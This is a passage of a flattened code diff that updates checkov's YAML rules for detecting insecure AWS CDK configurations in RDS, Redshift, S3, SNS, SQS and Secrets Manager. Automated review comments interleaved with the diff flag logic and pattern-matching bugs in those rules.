multiAZ: true ,)' + - pattern: new $RDS.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnDBInstance|DatabaseInstance) + - not_pattern: | + 'new $RDS.$FUNC(, multiAZ: true ,)' \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/RDSPubliclyAccessible.yaml b/checkov/cdk/checks/typescript/RDSPubliclyAccessible.yaml new file mode 100644 index 00000000000..240b25ccab7 --- /dev/null +++ b/checkov/cdk/checks/typescript/RDSPubliclyAccessible.yaml 
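Review bot: The `not_pattern` binds `$COUNT` to any value, so `monitoringInterval: 0` (enhanced monitoring explicitly disabled) is excluded from the failing set, and the `$COUNT > 0` comparison that follows has nothing to act on because the positive pattern never binds `$COUNT` — the in-file comment acknowledges this. Until the engine supports comparisons inside `not_pattern`, a second `or` branch that positively matches `new $PACKAGE.aws_rds.DatabaseInstance(, , { , monitoringInterval: 0, })` would at least fail the explicitly disabled case. The comment itself has a typo (`preform` → `perform`) and cites an internal ticket id that outside readers cannot follow; a one-line description of the limitation would age better.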
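Review bot: Both `not_pattern` block scalars in the CKV_AWS_157 hunk wrap the pattern in single quotes (`'new $FUNC(, multiAZ: true ,)'`); under `|` the quotes become part of the pattern text, so it is unlikely to match any call, whereas the S3BucketLogging and other hunks write the same construct unquoted. The same quoted form appears in the RDSPubliclyAccessible, RedshiftClusterLogging, RedshiftInEc2ClassicMode, S3BlockPublicPolicy and S3BucketVersioning hunks. Separately, the CDK property is spelled `multiAz` in both `DatabaseInstanceProps` and `CfnDBInstanceProps`, so unless the matcher compares property names case-insensitively the `multiAZ` spelling leaves every instance flagged; a fixture with `multiAz: true` would confirm which.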
@@ -0,0 +1,25 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_17 + name: Ensure all data stored in RDS is not publicly accessible + category: NETWORKING + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnDBInstance|DatabaseInstance) + - not_pattern: | + 'new $FUNC(, publicly_accessible: true ,)' + - pattern: new $RDS.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnDBInstance|DatabaseInstance) + - not_pattern: | + 'new $RDS.$FUNC(, publicly_accessible: true ,)' diff --git a/checkov/cdk/checks/typescript/RedShiftSSL.yaml b/checkov/cdk/checks/typescript/RedShiftSSL.yaml new file mode 100644 index 00000000000..841ebc20a99 --- /dev/null +++ b/checkov/cdk/checks/typescript/RedShiftSSL.yaml @@ -0,0 +1,19 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_105 + name: Ensure Redshift uses SSL + category: ENCRYPTION + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $REDSHIFT.CfnClusterParameterGroup() + conditions: + - not_pattern: | + new $REDSHIFT.CfnClusterParameterGroup(, {, parameters: [, {, parameterName: 'require_ssl' ,, parameterValue: 'true', } ,], }, ) + - not_pattern: | + new $REDSHIFT.CfnClusterParameterGroup(, {, parameters: [, {, parameterValue: 'true', , parameterName: 'require_ssl' ,} ,], }, ) diff --git a/checkov/cdk/checks/typescript/RedshiftClusterEncryption.yaml b/checkov/cdk/checks/typescript/RedshiftClusterEncryption.yaml new file mode 100644 index 00000000000..68cfb664283 --- /dev/null +++ b/checkov/cdk/checks/typescript/RedshiftClusterEncryption.yaml 
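Review bot: The logic of the CKV_AWS_17 hunk is inverted: with `approach: define failing`, `pattern: new $FUNC()` plus `not_pattern: ... publicly_accessible: true` reports every DB instance that does *not* set the property to true, while an instance that does (the insecure case) is the one that passes. The RedshiftClusterPubliclyAccessible hunk below shows the intended shape — positively match the insecure value, e.g. `- pattern: new $RDS.$FUNC(, {, publiclyAccessible: true, } ,)` with no `not_pattern`. `publicly_accessible` is also the Terraform attribute name; the CDK prop on both `DatabaseInstance` and `CfnDBInstance` is `publiclyAccessible`.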
@@ -0,0 +1,30 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_64 + name: Ensure all data stored in the Redshift cluster is securely encrypted at rest + category: ENCRYPTION + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + patterns: + or: + - pattern: new $REDSHIFT.CfnCluster() + conditions: + - not_pattern: | + new $REDSHIFT.CfnCluster(, {, encrypted: true, } ,) + - pattern: new $REDSHIFT.Cluster() + conditions: + - not_pattern: | + new $REDSHIFT.Cluster(, {, encrypted: true, } ,) + - pattern: new CfnCluster() + conditions: + - not_pattern: | + new CfnCluster(, {, encrypted: true, } ,) + - pattern: new Cluster() + conditions: + - not_pattern: | + new Cluster(, {, encrypted: true, } ,) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/RedshiftClusterLogging.yaml b/checkov/cdk/checks/typescript/RedshiftClusterLogging.yaml new file mode 100644 index 00000000000..7c989c414c8 --- /dev/null +++ b/checkov/cdk/checks/typescript/RedshiftClusterLogging.yaml @@ -0,0 +1,25 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_71 + name: Ensure Redshift Cluster logging is enabled + category: LOGGING + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) + - not_pattern: | + 'new $FUNC(, logging_properties: $FUNC.LoggingPropertiesProperty = {, bucketName:$ARG, } ,)' + - pattern: new $REDSHIFT.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) + - not_pattern: | + 'new $REDSHIFT.$FUNC(, logging_properties: $REDSHIFT.$FUNC.LoggingPropertiesProperty = {, bucketName:$ARG, } ,)' \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/RedshiftClusterPubliclyAccessible.yaml b/checkov/cdk/checks/typescript/RedshiftClusterPubliclyAccessible.yaml new file mode 100644 index 00000000000..2e158c01ad1 
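Review bot: The `new Cluster()` and `new $REDSHIFT.Cluster()` branches of the CKV_AWS_64 hunk match any constructor named `Cluster`, since `$REDSHIFT` is unconstrained, so `new ecs.Cluster(...)` or `new eks.Cluster(...)` would be reported as an unencrypted Redshift cluster. The RedshiftClusterLogging and RedshiftInEc2ClassicMode hunks go further with the unanchored `(?i)(CfnCluster|Cluster|ClusterProps)` regex, which matches any identifier containing `cluster`. The CKV_AWS_117 and CKV_AWS_44 hunks earlier in this change show the tighter alternative — `metavariable: $PACKAGE` / `comparison: $PACKAGE == "aws-cdk-lib"` or a `type:` condition — which keeps the check on Redshift resources. This file also uses `definition: patterns: or:` while most siblings use `definition: or:`; if the loader accepts both it is only inconsistent, otherwise one of the two forms is silently ignored.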
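Review bot: The `not_pattern` text `logging_properties: $FUNC.LoggingPropertiesProperty = {, bucketName:$ARG, }` in the CKV_AWS_71 hunk is not a shape that occurs in TypeScript: `logging_properties` is snake_case (the CfnCluster prop is `loggingProperties`), and a `Type = { ... }` assignment cannot appear as a property value inside a constructor call. As written the exclusion presumably never matches, so every cluster the positive pattern catches is reported, including ones with logging configured. Something like `new $REDSHIFT.$FUNC(, {, loggingProperties: {, bucketName: $ARG, }, } ,)` is closer to the CfnCluster form; the quoted-scalar problem noted on the CKV_AWS_157 hunk applies here as well.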
--- /dev/null +++ b/checkov/cdk/checks/typescript/RedshiftClusterPubliclyAccessible.yaml @@ -0,0 +1,22 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_87 + name: Redshift cluster should not be publicly accessible + category: NETWORKING + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + patterns: + or: + - pattern: | + new $REDSHIFT.CfnCluster(, {, publiclyAccessible: true, } ,) + - pattern: | + new $REDSHIFT.Cluster(, {, publiclyAccessible: true, } ,) + - pattern: | + new CfnCluster(, {, publiclyAccessible: true, } ,) + - pattern: | + new Cluster(, {, publiclyAccessible: true, } ,) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/RedshiftInEc2ClassicMode.yaml b/checkov/cdk/checks/typescript/RedshiftInEc2ClassicMode.yaml new file mode 100644 index 00000000000..cad3fb6bd56 --- /dev/null +++ b/checkov/cdk/checks/typescript/RedshiftInEc2ClassicMode.yaml @@ -0,0 +1,25 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_154 + name: Ensure Redshift is not deployed outside of a VPC + category: NETWORKING + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) + - not_pattern: | + 'new $FUNC(, clusterSubnetGroupName: $ARG ,)' + - pattern: new $REDSHIFT.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) + - not_pattern: | + 'new $REDSHIFT.$FUNC(, clusterSubnetGroupName: $ARG ,)' \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/S3BlockPublicACLs.yaml b/checkov/cdk/checks/typescript/S3BlockPublicACLs.yaml new file mode 100644 index 00000000000..521f6915721 --- /dev/null +++ b/checkov/cdk/checks/typescript/S3BlockPublicACLs.yaml 
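Review bot: The `not_pattern` in the CKV_AWS_154 hunk keys on `clusterSubnetGroupName`, which is a `CfnCluster` property, while the `(?i)(CfnCluster|Cluster|ClusterProps)` regex also pulls in the L2 `Cluster` construct, whose VPC placement is expressed through `vpc`/`subnetGroup` rather than a subnet group name; every L2 cluster would therefore be flagged. Either drop `Cluster`/`ClusterProps` from the regex or add an L2 branch such as `not_pattern: new $REDSHIFT.$FUNC(, {, vpc: $ARG ,}, )`. The unanchored regex and quoted block scalars carry the same issues already raised on the CKV_AWS_64 and CKV_AWS_157 hunks.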
@@ -0,0 +1,26 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_53 + name: Ensure S3 bucket has block public ACLS enabled + category: GENERAL_SECURITY + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + patterns: + or: + - pattern: new $S3.Bucket() + conditions: + - not_pattern: | + new $S3.Bucket(, { , blockPublicAccess: $S3.BlockPublicAccess.BLOCK_ACLS , } ,) + - not_pattern: | + new $S3.Bucket(, { , blockPublicAccess: $S3.BlockPublicAccess.BLOCK_ALL , } ,) + - pattern: new Bucket() + conditions: + - not_pattern: | + new Bucket(, { , blockPublicAccess: BlockPublicAccess.BLOCK_ACLS , } ,) + - not_pattern: | + new Bucket(, { , blockPublicAccess: BlockPublicAccess.BLOCK_ALL , } ,) diff --git a/checkov/cdk/checks/typescript/S3BlockPublicPolicy.yaml b/checkov/cdk/checks/typescript/S3BlockPublicPolicy.yaml new file mode 100644 index 00000000000..1813bc5c663 --- /dev/null +++ b/checkov/cdk/checks/typescript/S3BlockPublicPolicy.yaml @@ -0,0 +1,33 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_54 + name: Ensure S3 bucket has block public policy enabled + category: GENERAL_SECURITY + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - patterns: + or: + - not_pattern: | + 'new $FUNC(, publicReadAccess: false ,)' + - not_pattern: | + "new $FUNC(, accessControl: 'Private' ,)" + - pattern: new $S3.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - patterns: + or: + - not_pattern: | + 'new $S3.$FUNC(, publicReadAccess: false ,)' + - not_pattern: | + "new $S3.$FUNC(, accessControl: 'Private' ,)" \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/S3BucketEncryption.yaml b/checkov/cdk/checks/typescript/S3BucketEncryption.yaml index 72629895e79..24156973ef5 100644 --- a/checkov/cdk/checks/typescript/S3BucketEncryption.yaml 
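Review bot: The CKV_AWS_53 hunk only recognises the two enum constants `$S3.BlockPublicAccess.BLOCK_ACLS` and `BLOCK_ALL`, so a bucket configured with a constructed `new s3.BlockPublicAccess({ blockPublicAcls: true, ... })` is still reported, and `CfnBucket` (whose equivalent is `publicAccessBlockConfiguration: { blockPublicAcls: true }`) is not covered at all. The S3RestrictPublicBuckets hunk below shows a `CfnBucket` branch of that shape that could be mirrored here. `definition: patterns: or:` differs from the `definition: or:` used by most sibling files; worth confirming the loader treats both the same.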
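Review bot: None of the conditions in the CKV_AWS_54 hunk test the block-public-policy setting: `publicReadAccess: false` is the CDK default, so every bucket that does not spell it out is reported, and `accessControl: 'Private'` compares against a string where the CDK prop takes the `BucketAccessControl` enum. A bucket created with `blockPublicAccess: s3.BlockPublicAccess.BLOCK_ALL` (which sets `blockPublicPolicy`) would still fail. A `not_pattern` on `blockPublicAccess: $S3.BlockPublicAccess.BLOCK_ALL`, as the CKV_AWS_53 hunk above does, plus a `CfnBucket` branch keyed on `publicAccessBlockConfiguration: {, blockPublicPolicy: true ,}`, would match the check's name. The nested `- patterns: or:` inside the `conditions` list is also a structure no other file in this change uses; if the loader does not support it the two exclusions are silently dropped.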
+++ b/checkov/cdk/checks/typescript/S3BucketEncryption.yaml @@ -1,47 +1,27 @@ metadata: - version: 0.1 + version: 0.2 + approach: define failing id: CKV_AWS_19 name: Ensure all data stored in the S3 bucket is securely encrypted at rest category: ENCRYPTION + framework: cdk scope: languages: - - javascript - typescript definition: - - or: - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import { Bucket, BucketEncryption } from "aws-cdk-lib/aws-s3" - ... - - or: - - and: - - cond_type: pattern - operator: equals - value: "new Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new Bucket(..., {..., encryption: BucketEncryption.$ANY_VAR, ...}, ...)" - - cond_type: pattern - operator: equals - value: "new Bucket(..., {..., encryption: BucketEncryption.UNENCRYPTED, ...}, ...)" - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import * as $Y from "aws-cdk-lib/aws-s3" - ... - - or: - - and: - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new $Y.Bucket(..., {..., encryption: $Y.BucketEncryption.$ANY_VAR, ...}, ...)" - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(..., {..., encryption: $Y.BucketEncryption.UNENCRYPTED, ...}, ...)" + pattern: new $AWS.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + new $AWS.$FUNC(, { , encryption: $AWS.BucketEncryption.KMS_MANAGED, } ,) + - not_pattern: | + new $AWS.$FUNC(, { , encryption: $AWS.BucketEncryption.S3_MANAGED, } ,) + - not_pattern: | + new $AWS.$FUNC(, { , encryption: $AWS.BucketEncryption.KMS, } ,) + - not_pattern: | + new $AWS.$FUNC(, { , encryption: BucketEncryption.KMS_MANAGED, } ,) + - not_pattern: | + new $AWS.$FUNC(, { , encryption: BucketEncryption.S3_MANAGED, } ,) + - not_pattern: | + new $AWS.$FUNC(, { , encryption: BucketEncryption.KMS, } ,) \ No newline at end of file 
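Review bot: The regex admits `CfnBucket`, but all six `not_pattern`s use the L2 `encryption: BucketEncryption.*` prop; `CfnBucketProps` expresses encryption as `bucketEncryption: { serverSideEncryptionConfiguration: [...] }`, so every `CfnBucket` with encryption configured is still reported. The same L1/L2 mismatch is in the S3BucketKMSEncryption (`encryption`), S3BucketLogging (`serverAccessLogsBucket` vs `loggingConfiguration`), S3BucketPublicAccessBlock (`blockPublicAccess` vs `publicAccessBlockConfiguration`) and S3BucketVersioning (`versioned` vs `versioningConfiguration`) hunks; the S3RestrictPublicBuckets hunk shows the separate-`CfnBucket`-branch approach that fixes it. `(?i)(Bucket|CfnBucket)` is also unanchored, so `new s3deploy.BucketDeployment(...)` or `new s3.BucketPolicy(...)` match `$AWS.$FUNC` and are reported as unencrypted buckets; anchoring it, e.g. `regex: (?i)^(Bucket|CfnBucket)$`, avoids that. If the pinned aws-cdk-lib exposes `BucketEncryption.DSSE` / `DSSE_MANAGED`, those encrypted buckets would be flagged too.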
diff --git a/checkov/cdk/checks/typescript/S3BucketKMSEncryption.yaml b/checkov/cdk/checks/typescript/S3BucketKMSEncryption.yaml index 92b1dd0bf49..d67f639bf17 100644 --- a/checkov/cdk/checks/typescript/S3BucketKMSEncryption.yaml +++ b/checkov/cdk/checks/typescript/S3BucketKMSEncryption.yaml 
@@ -1,57 +1,23 @@ metadata: - version: 0.1 + version: 0.2 + approach: define failing id: CKV_AWS_145 name: Ensure that S3 buckets are encrypted with KMS by default category: ENCRYPTION + framework: cdk scope: languages: - - javascript - typescript definition: - - or: - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import { Bucket, BucketEncryption } from "aws-cdk-lib/aws-s3" - ... - - or: - - and: - - cond_type: pattern - operator: equals - value: "new Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new Bucket(..., {..., encryption: BucketEncryption.$ANY_VAR, ...}, ...)" - - and: - - cond_type: variable - variable: $ENCRYPTION - operator: regex_match - value: ^(S3_MANAGED|UNENCRYPTED)$ - - cond_type: pattern - operator: equals - value: "new Bucket(..., {..., encryption: BucketEncryption.$ENCRYPTION, ...}, ...)" - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import * as $Y from "aws-cdk-lib/aws-s3" - ... - - or: - - and: - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new $Y.Bucket(..., {..., encryption: $Y.BucketEncryption.$ANY_VAR, ...}, ...)" - - and: - - cond_type: variable - variable: $ENCRYPTION - operator: regex_match - value: ^(S3_MANAGED|UNENCRYPTED)$ - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(..., {..., encryption: $Y.BucketEncryption.$ENCRYPTION, ...}, ...)" + pattern: new $AWS.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + new $AWS.$FUNC(, { , encryption: $AWS.BucketEncryption.KMS_MANAGED, } ,) + - not_pattern: | + new $AWS.$FUNC(, { , encryption: $AWS.BucketEncryption.KMS, } ,) + - not_pattern: | + new $AWS.$FUNC(, { , encryption: BucketEncryption.KMS_MANAGED, } ,) + - not_pattern: | + new $AWS.$FUNC(, { , encryption: BucketEncryption.KMS, } ,) \ No newline at end of file 
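Review bot: A bucket that passes `encryptionKey: key` without an explicit `encryption:` is reported by this hunk, yet the CDK infers `BucketEncryption.KMS` whenever `encryptionKey` is set, so that is a false positive for the check's stated intent. Adding `- not_pattern: new $AWS.$FUNC(, { , encryptionKey: $KEY, } ,)` alongside the four existing exclusions would cover it. The `CfnBucket` prop-name and unanchored-regex issues raised on the S3BucketEncryption hunk apply here unchanged.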
diff --git a/checkov/cdk/checks/typescript/S3BucketLogging.yaml b/checkov/cdk/checks/typescript/S3BucketLogging.yaml index 702c8662e6b..797d673a7a3 100644 --- a/checkov/cdk/checks/typescript/S3BucketLogging.yaml +++ b/checkov/cdk/checks/typescript/S3BucketLogging.yaml @@ -1,37 +1,17 @@ metadata: - version: 0.1 + version: 0.2 + approach: define failing id: CKV_AWS_18 name: Ensure the S3 bucket has access logging enabled category: LOGGING + framework: cdk scope: languages: - - javascript - typescript definition: - - or: - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import { Bucket } from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new Bucket(..., {..., serverAccessLogsBucket: $ANY_VAR, ...}, ...)" - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import * as $Y from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new $Y.Bucket(..., {..., serverAccessLogsBucket: $ANY_VAR, ...}, ...)" + pattern: new $AWS.$FUNC() + conditions: + - metavariable: $FUNC + regex: (Bucket|CfnBucket) + - not_pattern: | + new $AWS.$FUNC(, { , serverAccessLogsBucket: , } ,) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/S3BucketPublicAccessBlock.yaml b/checkov/cdk/checks/typescript/S3BucketPublicAccessBlock.yaml index e681a928245..7f8261284a2 100644 --- a/checkov/cdk/checks/typescript/S3BucketPublicAccessBlock.yaml +++ b/checkov/cdk/checks/typescript/S3BucketPublicAccessBlock.yaml 
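Review bot: The `regex: (Bucket|CfnBucket)` in the CKV_AWS_18 hunk is the only one in this change without the `(?i)` flag the sibling S3 checks use; either is defensible, but the inconsistency suggests one of them is unintended. The `CfnBucket` prop-name mismatch (`serverAccessLogsBucket` vs `loggingConfiguration`) is covered in the note on the S3BucketEncryption hunk.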
@@ -1,37 +1,17 @@ metadata: - version: 0.1 + version: 0.2 + approach: define failing id: CKV2_AWS_6 name: Ensure that S3 bucket has a Public Access block category: NETWORKING + framework: cdk scope: languages: - - javascript - typescript definition: - - or: - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import { Bucket } from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new Bucket(..., {..., blockPublicAccess: $ANY_VAR, ...}, ...)" - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import * as $Y from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new $Y.Bucket(..., {..., blockPublicAccess: $ANY_VAR, ...}, ...)" + pattern: new $S3.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + new $S3.$FUNC(, { , blockPublicAccess: , } ,) diff --git a/checkov/cdk/checks/typescript/S3BucketVersioning.yaml b/checkov/cdk/checks/typescript/S3BucketVersioning.yaml index 0bad75c3468..54addc71e13 100644 --- a/checkov/cdk/checks/typescript/S3BucketVersioning.yaml +++ b/checkov/cdk/checks/typescript/S3BucketVersioning.yaml 
@@ -1,37 +1,24 @@ metadata: - version: '0.1' + version: 0.2 id: CKV_AWS_21 name: Ensure all data stored in the S3 bucket have versioning enabled category: BACKUP_AND_RECOVERY + framework: cdk scope: languages: - javascript - typescript definition: - - or: - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import { Bucket } from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new Bucket(..., {..., versioned: true, ...}, ...)" - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import * as $Y from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new $Y.Bucket(..., {..., versioned: true, ...}, ...)" + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, versioned: true ,)' + - pattern: new $S3.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $S3.$FUNC(, versioned: true ,)' diff --git a/checkov/cdk/checks/typescript/S3PublicACLRead.yaml b/checkov/cdk/checks/typescript/S3PublicACLRead.yaml new file mode 100644 index 00000000000..01d6c284d5f --- /dev/null +++ b/checkov/cdk/checks/typescript/S3PublicACLRead.yaml @@ -0,0 +1,22 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_20 + name: Ensure the S3 bucket does not allow READ permissions to everyone + category: GENERAL_SECURITY + framework: cdk +scope: + languages: + - typescript +definition: + or: + - pattern: | + new $AWS.Bucket(, {, accessControl: $ARG, }, ) + conditions: + or: + - metavariable: $ARG + pattern: $AWS.BucketAccessControl.PUBLIC_READ + - metavariable: $ARG + pattern: $AWS.BucketAccessControl.PUBLIC_READ_WRITE + - pattern: | + new $AWS.Bucket(, { , publicReadAccess: true, }, ) 
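Review bot: The CKV_AWS_21 metadata in this hunk is the only 0.2 definition in the change without `approach: define failing`; if the engine defaults to a different approach, this check's polarity would differ from its siblings. Adding `approach: define failing` under `version: 0.2` keeps it consistent. The quoted `'new $FUNC(, versioned: true ,)'` block scalars share the problem raised on the CKV_AWS_157 hunk, and the `CfnBucket` mismatch (`versioned` vs `versioningConfiguration`) is covered in the S3BucketEncryption note.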
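Review bot: In the CKV_AWS_20 hunk `conditions:` is a mapping (`conditions: or: - metavariable ...`) whereas every other hunk in this change gives `conditions` as a list; if the loader expects a list, the `$ARG` restriction is dropped and the first branch reports every bucket that sets `accessControl` at all. The same outcome could be written in the list shape the siblings use, for example two `or` branches with `accessControl: $AWS.BucketAccessControl.PUBLIC_READ` and `PUBLIC_READ_WRITE` inlined into the pattern. Only the L2 `Bucket` is covered; `CfnBucket` with `accessControl: 'PublicRead'` would pass.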
diff --git a/checkov/cdk/checks/typescript/S3RestrictPublicBuckets.yaml b/checkov/cdk/checks/typescript/S3RestrictPublicBuckets.yaml new file mode 100644 index 00000000000..d9d17ab7c39 --- /dev/null +++ b/checkov/cdk/checks/typescript/S3RestrictPublicBuckets.yaml @@ -0,0 +1,21 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_56 + name: Ensure S3 bucket has 'restrict_public_buckets' enabled + category: GENERAL_SECURITY + framework: cdk +scope: + languages: + - typescript +definition: + patterns: + or: + - pattern: new $AWS.Bucket() + conditions: + - not_pattern: | + new $AWS.Bucket(, { , blockPublicAccess: s3.BlockPublicAccess.BLOCK_ALL, } ,) + - pattern: new $AWS.CfnBucket() + conditions: + - not_pattern: | + new $AWS.CfnBucket(, {, publicAccessBlockConfiguration: {, restrictPublicBuckets: true ,}, } , ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/SNSTopicEncryption.yaml b/checkov/cdk/checks/typescript/SNSTopicEncryption.yaml new file mode 100644 index 00000000000..ea58416b1e5 --- /dev/null +++ b/checkov/cdk/checks/typescript/SNSTopicEncryption.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_26 + name: Ensure all data stored in the SNS topic is encrypted + category: Encryption + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.Topic() + conditions: + - not_pattern: | + new $AWS.Topic(, {, masterKey: $ARG , }, ) diff --git a/checkov/cdk/checks/typescript/SQSQueueEncryption.yaml b/checkov/cdk/checks/typescript/SQSQueueEncryption.yaml new file mode 100644 index 00000000000..34cb89e574e --- /dev/null +++ b/checkov/cdk/checks/typescript/SQSQueueEncryption.yaml 
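Review bot: The first `not_pattern` in the CKV_AWS_56 hunk hard-codes the import alias `s3.BlockPublicAccess.BLOCK_ALL` while the surrounding pattern uses `$AWS.Bucket`, so code that imports the module under any other name (or via `aws_cdk_lib.aws_s3`) never matches the exclusion and is reported. Using the metavariable, `new $AWS.Bucket(, { , blockPublicAccess: $AWS.BlockPublicAccess.BLOCK_ALL, } ,)`, mirrors what the S3BlockPublicACLs hunk does. A constructed `new s3.BlockPublicAccess({ restrictPublicBuckets: true, ... })` is likewise not recognised.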
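Review bot: The CKV_AWS_26 hunk sets `category: Encryption` while every other file in this change writes `category: ENCRYPTION`; if categories are resolved against an enum by name this check will fail to load or land in an unknown category. Changing it to `category: ENCRYPTION` removes the inconsistency. Only the L2 `Topic` is matched; a `CfnTopic` branch keyed on `kmsMasterKeyId` would give the same coverage the SQS hunk below provides for its L1 construct.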
@@ -0,0 +1,21 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_27 + name: Ensure all data stored in the SQS queue is encrypted + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + patterns: + or: + - pattern: new $AWS.Queue() + conditions: + - not_pattern: | + new $AWS.Queue(, {, encryptionMasterKey: $KEY, }, ) + - pattern: new $AWS.CfnQueue() + conditions: + - not_pattern: | + new $AWS.CfnQueue(, {, kmsMasterKeyId: $KEY, }, ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/SecretManagerSecretEncrypted.yaml b/checkov/cdk/checks/typescript/SecretManagerSecretEncrypted.yaml new file mode 100644 index 00000000000..5bc4d530c83 --- /dev/null +++ b/checkov/cdk/checks/typescript/SecretManagerSecretEncrypted.yaml @@ -0,0 +1,22 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_149 + name: Ensure that Secrets Manager secret is encrypted using KMS CMK + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + patterns: + or: + - pattern: new $AWS.Secret() + conditions: + - not_pattern: | + new $AWS.Secret(, {, encryptionKey: $KEY ,}, ) + - pattern: | + new $AWS.Secret(, { , encryptionKey: $ARG2, } , ) + conditions: + - metavariable: $ARG2 + regex: (aws/) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/SecurityGroupRuleDescription.yaml b/checkov/cdk/checks/typescript/SecurityGroupRuleDescription.yaml new file mode 100644 index 00000000000..1d6160de8e0 --- /dev/null +++ b/checkov/cdk/checks/typescript/SecurityGroupRuleDescription.yaml 
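Review bot: The `Queue` branch of the CKV_AWS_27 hunk only excludes `encryptionMasterKey: $KEY`, but the L2 `Queue` also enables encryption through `encryption: sqs.QueueEncryption.KMS_MANAGED` or `SQS_MANAGED` with no key, so those encrypted queues are reported. Adding `- not_pattern: new $AWS.Queue(, {, encryption: $AWS.QueueEncryption.$MODE, }, )` together with a metavariable regex on `$MODE` excluding `UNENCRYPTED` would cover them. The `CfnQueue` branch similarly misses `sqsManagedSseEnabled: true`.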
